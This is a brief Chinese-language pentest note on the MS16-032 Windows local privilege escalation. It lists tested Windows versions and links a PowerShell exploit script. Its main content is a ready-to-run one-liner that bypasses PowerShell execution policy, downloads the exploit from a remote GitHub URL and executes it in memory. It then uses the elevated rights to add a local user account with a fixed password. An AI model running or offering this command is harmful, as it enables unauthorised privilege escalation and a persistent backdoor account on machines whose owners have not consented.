试用系统:
Tested on x32 Win7, x64 Win8, x64 2k12R2
提权powershell脚本:
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1‘);Invoke-MS16-032 -Application cmd.exe -commandline ‘/c net user evi1cg test123 /add‘"